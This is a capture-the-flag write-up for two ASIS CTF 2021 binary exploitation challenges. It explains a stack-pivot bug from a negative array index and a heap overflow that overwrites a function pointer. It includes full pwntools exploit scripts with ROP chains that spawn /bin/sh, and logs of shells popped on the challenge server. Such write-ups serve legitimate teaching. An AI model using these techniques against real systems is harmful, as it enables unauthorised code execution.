[ASIS CTF QUALS 2021 - pwn] abbr & justpwnit
Hello folks ! Here is a write up for the two first pwn challenges of the ASIS CTF. You can find the related files here.
justpwnit
justpwnit was a warmup pwn challenge. That’s only a basic stack overflow. The binary is statically linked and here is the checksec’s output:
[*] '/home/nasm/justpwnit'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Morever the source code is provided as it is the case for all the pwn tasks ! Here it is:
/*
* musl-gcc main.c -o chall -no-pie -fno-stack-protector -O0 -static
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define STR_SIZE 0x80
void set_element(char **parray) {
int index;
printf("Index: ");
if (scanf("%d%*c", &index) != 1)
exit(1);
if (!(parray[index] = (char*)calloc(sizeof(char), STR_SIZE)))
exit(1);
printf("Data: ");
if (!fgets(parray[index], STR_SIZE, stdin))
exit(1);
}
void justpwnit() {
char *array[4];
for (int i = 0; i < 4; i++) {
set_element(array);
}
}
int main() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
alarm(180);
justpwnit();
return 0;
}
The program is basically reading STR_SIZE bytes into parray[index], the issue is that there is no check on the user controlled index from which we choose were write the input.
Furthermore, index is a signed integer, which means we can input a negative value. If we do so we will be able to overwrite the saved $rbp value of the set_element stackframe by a heap pointer to our input. By this way at the end of the pwninit, the leave instruction will pivot the stack from the original state to a pointer to the user input.
Let’s see this in gdb !
00:0000│ rsp 0x7ffef03864e0 ◂— 0x0
01:0008│ 0x7ffef03864e8 —▸ 0x7ffef0386520 ◂— 0xb4
02:0010│ 0x7ffef03864f0 ◂— 0x0
03:0018│ 0x7ffef03864f8 ◂— 0xfffffffe00403d3f /* '?=@' */
04:0020│ 0x7ffef0386500 ◂— 0x0
05:0028│ 0x7ffef0386508 —▸ 0x40123d (main) ◂— endbr64
06:0030│ rbx rbp 0x7ffef0386510 —▸ 0x7ffef0386550 —▸ 0x7ffef0386560 ◂— 0x1
07:0038│ 0x7ffef0386518 —▸ 0x40122f (justpwnit+33) ◂— add dword ptr [rbp - 4], 1
08:0040│ rax 0x7ffef0386520 ◂— 0xb4
09:0048│ 0x7ffef0386528 ◂— 0x0
... ↓ 4 skipped
0e:0070│ 0x7ffef0386550 —▸ 0x7ffef0386560 ◂— 0x1
0f:0078│ 0x7ffef0386558 —▸ 0x401295 (main+88) ◂— mov eax, 0
That’s the stack’s state when we are calling calloc. We can see the set_element’s stackframe which ends up in $rsp+38 with the saved return address. And right after we see that $rax contains the address of the parray buffer. Which means that if we send -2 as index, $rbp will point to the newly allocated buffer to which we will write right after with fgets.
Then, if we do so, the stack’s state looks like this:
00:0000│ rsp 0x7ffef03864e0 ◂— 0x0
01:0008│ 0x7ffef03864e8 —▸ 0x7ffef0386520 ◂— 0xb4
02:0010│ 0x7ffef03864f0 ◂— 0x0
03:0018│ 0x7ffef03864f8 ◂— 0xfffffffe00403d3f /* '?=@' */
04:0020│ 0x7ffef0386500 ◂— 0x0
05:0028│ 0x7ffef0386508 —▸ 0x40123d (main) ◂— endbr64
06:0030│ rbx rbp 0x7ffef0386510 —▸ 0x7f2e4aea1050 ◂— 0x0
07:0038│ 0x7ffef0386518 —▸ 0x40122f (justpwnit+33) ◂— add dword ptr [rbp - 4], 1
08:0040│ 0x7ffef0386520 ◂— 0xb4
09:0048│ 0x7ffef0386528 ◂— 0x0
... ↓ 4 skipped
0e:0070│ 0x7ffef0386550 —▸ 0x7ffef0386560 ◂— 0x1
0f:0078│ 0x7ffef0386558 —▸ 0x401295 (main+88) ◂— mov eax, 0
The saved $rbp has been overwritten with a pointer to the user input. Then, at the end of the set_element function, $rbp is popped from the stack and contains a pointer to the user input. Which causes at the end of the justpwnit function, the leave instruction moves the pointer to the user input in $rsp.
ROPchain
Once we can pivot the stack to makes it point to some user controlled areas, we just have to rop through all the gadgets we can find in the binary.
The binary is statically linked, and there is no system function in the binary, so we can’t make a ret2system, we have to make a execve("/bin/sh\0", NULL, NULL).
And so what we need is:
- pop rdi gadget
- pop rsi gadget
- pop rdx gadget
- pop rax gadget
- syscall gadget
- mov qword ptr [reg], reg [to write “/bin/sh\0”] in a writable area
We can easily find these gadgets with the help ROPgadget. We got:
0x0000000000406c32 : mov qword ptr [rax], rsi ; ret
0x0000000000401001 : pop rax ; ret
0x00000000004019a3 : pop rsi ; ret
0x00000000004013e9 : syscall
0x0000000000403d23 : pop rdx ; ret
0x0000000000401b0d : pop rdi ; ret
Now we just have to craft the ropchain !
POP_RDI = 0x0000000000401b0d
POP_RDX = 0x0000000000403d23
SYSCALL = 0x00000000004013e9
POP_RAX = 0x0000000000401001
POP_RSI = 0x00000000004019a3
MOV_RSI_PTR_RAX = 0x0000000000406c32
PT_LOAD_W = 0x00000000040c240
pld = pwn.p64(0) + pwn.p64(POP_RSI) + b"/bin/sh\x00"
pld += pwn.p64(POP_RAX) + pwn.p64(PT_LOAD_W)
pld += pwn.p64(MOV_RSI_PTR_RAX)
pld += pwn.p64(POP_RAX) + pwn.p64(0x3b)
pld += pwn.p64(POP_RDI) + pwn.p64(PT_LOAD_W)
pld += pwn.p64(POP_RSI) + pwn.p64(0)
pld += pwn.p64(POP_RDX) + pwn.p64(0x0)
pld += pwn.p64(SYSCALL)
And we can enjoy the shell !
➜ justpwnit git:(master) ✗ python3 exploit.py HOST=168.119.108.148 PORT=11010
[*] '/home/nasm/pwn/asis2021/justpwnit/justpwnit'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to 168.119.108.148 on port 11010: Done
[*] Switching to interactive mode
$ id
uid=999(pwn) gid=999(pwn) groups=999(pwn)
$ ls
chall
flag-69a1f60d8055c88ea27fed1ab926b2b6.txt
$ cat flag-69a1f60d8055c88ea27fed1ab926b2b6.txt
ASIS{p01nt_RSP_2_h34p!_RHP_1n5t34d_0f_RSP?}
Full exploit
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this exploit was generated via
# 1) pwntools
# 2) ctfinit
import os
import time
import pwn
# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('justpwnit')
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
host = pwn.args.HOST
port = int(pwn.args.PORT or 1337)
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if pwn.args.GDB:
return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return pwn.process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = pwn.connect(host, port)
if pwn.args.GDB:
pwn.gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if pwn.args.LOCAL:
return local(argv, *a, **kw)
else:
return remote(argv, *a, **kw)
gdbscript = '''
source /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/Downloads/pwndbg/gdbinit.py
set follow-fork-mode parent
b* main
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
io = start()
io.sendlineafter(b"Index: ", b"-2")
# 0x0000000000406c32 : mov qword ptr [rax], rsi ; ret
# 0x0000000000401001 : pop rax ; ret
# 0x00000000004019a3 : pop rsi ; ret
# 0x00000000004013e9 : syscall
# 0x0000000000403d23 : pop rdx ; ret
# 0x0000000000401b0d : pop rdi ; ret
POP_RDI = 0x0000000000401b0d
POP_RDX = 0x0000000000403d23
SYSCALL = 0x00000000004013e9
POP_RAX = 0x0000000000401001
POP_RSI = 0x00000000004019a3
MOV_RSI_PTR_RAX = 0x0000000000406c32
PT_LOAD_W = 0x00000000040c240
pld = pwn.p64(0) + pwn.p64(POP_RSI) + b"/bin/sh\x00"
pld += pwn.p64(POP_RAX) + pwn.p64(PT_LOAD_W)
pld += pwn.p64(MOV_RSI_PTR_RAX)
pld += pwn.p64(POP_RAX) + pwn.p64(0x3b)
pld += pwn.p64(POP_RDI) + pwn.p64(PT_LOAD_W)
pld += pwn.p64(POP_RSI) + pwn.p64(0)
pld += pwn.p64(POP_RDX) + pwn.p64(0x0)
pld += pwn.p64(SYSCALL)
io.sendlineafter(b"Data: ", pld)
io.interactive()
abbr
abbr is very basic heap overflow, we just have to overwrite a function pointer to a stack pivot gadget with the help of a user controlled register. Then, we can drop a shell with a similar ROP as for the justpwnit challenge (the binary is also statically linked without the system function).
Here is the source code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <ctype.h>
#include "rules.h"
typedef struct Translator {
void (*translate)(char*);
char *text;
int size;
} Translator;
void english_expand(char *text) {
int i, alen, blen;
Rule *r;
char *p, *q;
char *end = &text[strlen(text)-1]; // pointer to the last character
/* Replace all abbreviations */
for (p = text; *p; ++p) {
for (i = 0; i < sizeof(rules) / sizeof(Rule); i++) {
r = &rules[i];
alen = strlen(r->a);
blen = strlen(r->b);
if (strncasecmp(p, r->a, alen) == 0) {
// i.e "i'm pwn noob." --> "i'm pwn XXnoob."
for (q = end; q > p; --q)
*(q+blen-alen) = *q;
// Update end
end += blen-alen;
*(end+1) = '\0';
// i.e "i'm pwn XXnoob." --> "i'm pwn newbie."
memcpy(p, r->b, blen);
}
}
}
}
Translator *translator_new(int size) {
Translator *t;
/* Allocate region for text */
char *text = (char*)calloc(sizeof(char), size);
if (text == NULL)
return NULL;
/* Initialize translator */
t = (Translator*)malloc(sizeof(Translator));
t->text = text;
t->size = size;
t->translate = english_expand;
return t;
}
void translator_reset(Translator *t) {
memset(t->text, 0, t->size);
}
int main() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
alarm(60);
Translator *t = translator_new(0x1000);
while (1) {
/* Input data */
translator_reset(t);
printf("Enter text: ");
fgets(t->text, t->size, stdin);
if (t->text[0] == '\n')
break;
/* Expand abbreviation */
t->translate(t->text);
printf("Result: %s", t->text);
}
return 0;
}
The rules.h looks like this:
typedef struct {
char *a; // abbreviated string (i.e "asap")
char *b; // expanded string (i.e "as soon as possible")
} Rule;
// Why are there so many abbreviations in English!!?? :exploding_head:
Rule rules[] =
{
{.a="2f4u", .b="too fast for you"},
{.a="4yeo", .b="for your eyes only"},
{.a="fyeo", .b="for your eyes only"},
{.a="aamof", .b="as a matter of fact"},
{.a="afaik", .b="as far as i know"},
{.a="afk", .b="away from keyboard"},
{.a="aka", .b="also known as"},
{.a="b2k", .b="back to keyboard"},
{.a="btk", .b="back to keyboard"},
{.a="btt", .b="back to topic"},
{.a="btw", .b="by the way"},
{.a="b/c", .b="because"},
{.a="c&p", .b="copy and paste"},
{.a="cys", .b="check your settings"},
{.a="diy", .b="do it yourself"},
{.a="eobd", .b="end of business day"},
{.a="faq", .b="frequently asked questions"},
{.a="fka", .b="formerly known as"},
{.a="fwiw", .b="for what it's worth"},
{.a="fyi", .b="for your information"},
{.a="jfyi", .b="just for your information"},
{.a="hf", .b="have fun"},
{.a="hth", .b="hope this helps"},
{.a="idk", .b="i don't know"},
{.a="iirc", .b="if i remember correctly"},
{.a="imho", .b="in my humble opinion"},
{.a="imo", .b="in my opinion"},
{.a="imnsho", .b="in my not so humble opinion"},
{.a="iow", .b="in other words"},
{.a="itt", .b="in this thread"},
{.a="dgmw", .b="don't get me wrong"},
{.a="mmw", .b="mark my words"},
{.a="nntr", .b="no need to reply"},
{.a="noob", .b="newbie"},
{.a="noyb", .b="none of your business"},
{.a="nrn", .b="no reply necessary"},
{.a="otoh", .b="on the other hand"},
{.a="rtfm", .b="read the fine manual"},
{.a="scnr", .b="sorry, could not resist"},
{.a="sflr", .b="sorry for late reply"},
{.a="tba", .b="to be announced"},
{.a="tbc", .b="to be continued"},
{.a="tia", .b="thanks in advance"},
{.a="tq", .b="thank you"},
{.a="tyvm", .b="thank you very much"},
{.a="tyt", .b="take your time"},
{.a="ttyl", .b="talk to you later"},
{.a="wfm", .b="works for me"},
{.a="wtf", .b="what the fuck"},
{.a="wrt", .b="with regard to"},
{.a="ymmd", .b="you made my day"},
{.a="icymi", .b="in case you missed it"},
// pwners abbreviations
{.a="rop ", .b="return oriented programming "},
{.a="jop ", .b="jump oriented programming "},
{.a="cop ", .b="call oriented programming "},
{.a="aar", .b="arbitrary address read"},
{.a="aaw", .b="arbitrary address write"},
{.a="www", .b="write what where"},
{.a="oob", .b="out of bounds"},
{.a="ret2", .b="return to "},
};
The main stuff is in english_expand function which is looking for an abreviation in the user input. If it finds the abbreviation, all the data after the occurence will be written further according to the length of the full expression.
The attack idea is fairly simple, the text variable is allocated right before the Translator structure, and so in the heap they will be contiguous. Given that, we know that if we send 0x1000 bytes in the chunk contained by text and that we put an abbreviation of the right length we can overwrite the translate function pointer.
I will not describe in details how we can find the right size for the abbreviation or the length off the necessary padding.
An interesting abbreviation is the www, which stands for “write what where” (what a nice abbreviation for a pwner lmao), indeed the expanded expression has a length of 16 bytes.
So we send b"wwwwww" + b"A"*(0x1000-16) + pwn.p64(gadget), we will overflow the 32 first bytes next the text chunk, and in this rewrite the translator function pointer.
ROPchain
Once that’s done, when the function pointer will be triggered at the next iteration, we will be able to jmp at an arbitrary location. Lets take a look at the values of the registers when we trigger the function pointer:
RAX 0x1ee8bc0 —▸ 0x4018da (init_cacheinfo+234) ◂— pop rdi
RBX 0x400530 (_IO_getdelim.cold+29) ◂— 0x0
RCX 0x459e62 (read+18) ◂— cmp rax, -0x1000 /* 'H=' */
*RDX 0x405121 (_nl_load_domain+737) ◂— xchg eax, esp
RDI 0x1ee8bc0 —▸ 0x4018da (init_cacheinfo+234) ◂— pop rdi
RSI 0x4c9943 (_IO_2_1_stdin_+131) ◂— 0x4cc020000000000a /* '\n' */
R8 0x1ee8bc0 —▸ 0x4018da (init_cacheinfo+234) ◂— pop rdi
R9 0x0
R10 0x49e522 ◂— 'Enter text: '
R11 0x246
R12 0x4030e0 (__libc_csu_fini) ◂— endbr64
R13 0x0
R14 0x4c9018 (_GLOBAL_OFFSET_TABLE_+24) —▸ 0x44fd90 (__strcpy_avx2) ◂— endbr64
R15 0x0
RBP 0x7ffdef1b8230 —▸ 0x403040 (__libc_csu_init) ◂— endbr64
RSP 0x7ffdef1b8220 ◂— 0x0
RIP 0x402036 (main+190) ◂— call rdx
$rax points to the newly readen input, same for $r8 and $rdi and $rdx contains the location to which we will jmp on.
So we can search gadgets like mov rsp, rax, mov rsp, rdi, mov rsp, r8 and so on. But I didn’t find any gadgets like that, so I looked for xchg rsp gadgets, and I finally found a xchg eax, esp gadgets ! Since the binary is not PIE based, the heap addresses fit into a 32 bits register, so that’s perfect!
Now we can make $rsp to point to the user input, we make a similar ropchain as the last challenge, and that’s enough to get a shell!
# 0x00000000004126e3 : call qword ptr [rax]
# 0x0000000000485fd2 : xchg eax, ebp ; ret
# 0x0000000000405121 : xchg eax, esp ; ret
pld = b"wwwwww"
pld += b"A"*(0x1000-16) + pwn.p64(0x0000000000405121)
io.sendlineafter("Enter text: ", pld)
# 0x000000000045a8f7 : pop rax ; ret
# 0x0000000000404cfe : pop rsi ; ret
# 0x00000000004018da : pop rdi ; ret
# 0x00000000004017df : pop rdx ; ret
# 0x000000000045684f : mov qword ptr [rdi], rsi ; ret
DATA_SEC = 0x0000000004c90e0
POP_RDI = 0x00000000004018da
POP_RSI = 0x0000000000404cfe
POP_RAX = 0x000000000045a8f7
POP_RDX = 0x00000000004017df
MOV_PTR_RDI_RSI = 0x000000000045684f
SYSCALL = 0x00000000004012e3 # syscall
pld = pwn.p64(POP_RDI)
pld += pwn.p64(DATA_SEC)
pld += pwn.p64(POP_RSI)
pld += b"/bin/sh\x00"
pld += pwn.p64(MOV_PTR_RDI_RSI)
pld += pwn.p64(POP_RSI)
pld += pwn.p64(0x0)
pld += pwn.p64(POP_RDX)
pld += pwn.p64(0x0)
pld += pwn.p64(POP_RAX)
pld += pwn.p64(0x3b)
pld += pwn.p64(SYSCALL)
We launch the script with the right arguments and we correctly pop a shell!
➜ abbr.d git:(master) ✗ python3 exploit.py HOST=168.119.108.148 PORT=10010
[*] '/home/nasm/pwn/asis2021/abbr.d/abbr'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to 168.119.108.148 on port 10010: Done
/home/nasm/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
$ id
uid=999(pwn) gid=999(pwn) groups=999(pwn)
$ ls
chall
flag-5db495dbd5a2ad0c090b1cc11e7ee255.txt
$ cat flag-5db495dbd5a2ad0c090b1cc11e7ee255.txt
ASIS{d1d_u_kn0w_ASIS_1s_n0t_4n_4bbr3v14t10n}
Final exploit
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this exploit was generated via
# 1) pwntools
# 2) ctfinit
import os
import time
import pwn
# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('abbr')
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if pwn.args.GDB:
return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return pwn.process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = pwn.connect(host, port)
if pwn.args.GDB:
pwn.gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if pwn.args.LOCAL:
return local(argv, *a, **kw)
else:
return remote(argv, *a, **kw)
gdbscript = '''
source /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/Downloads/pwndbg/gdbinit.py
b* 0x402036
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
io = start()
# 000000000048ac90 80 FUNC GLOBAL DEFAULT 7 _dl_make_stack_executable
# 0x0000000000422930 : add rsp, 0x10 ; pop rbp ; ret
# 0x00000000004126e3 : call qword ptr [rax]
# 0x0000000000485fd2 : xchg eax, ebp ; ret
# 0x0000000000405121 : xchg eax, esp ; ret
pld = b"wwwwww"
pld += b"A"*(0x1000-16) + pwn.p64(0x0000000000405121)
io.sendlineafter("Enter text: ", pld)
# 0x000000000045a8f7 : pop rax ; ret
# 0x0000000000404cfe : pop rsi ; ret
# 0x00000000004018da : pop rdi ; ret
# 0x00000000004017df : pop rdx ; ret
# 0x000000000045684f : mov qword ptr [rdi], rsi ; ret
DATA_SEC = 0x0000000004c90e0
POP_RDI = 0x00000000004018da
POP_RSI = 0x0000000000404cfe
POP_RAX = 0x000000000045a8f7
POP_RDX = 0x00000000004017df
MOV_PTR_RDI_RSI = 0x000000000045684f
SYSCALL = 0x00000000004012e3 # syscall
pld = pwn.p64(POP_RDI)
pld += pwn.p64(DATA_SEC)
pld += pwn.p64(POP_RSI)
pld += b"/bin/sh\x00"
pld += pwn.p64(MOV_PTR_RDI_RSI)
pld += pwn.p64(POP_RSI)
pld += pwn.p64(0x0)
pld += pwn.p64(POP_RDX)
pld += pwn.p64(0x0)
pld += pwn.p64(POP_RAX)
pld += pwn.p64(0x3b)
pld += pwn.p64(SYSCALL)
io.sendlineafter("Enter text: ", pld)
io.interactive()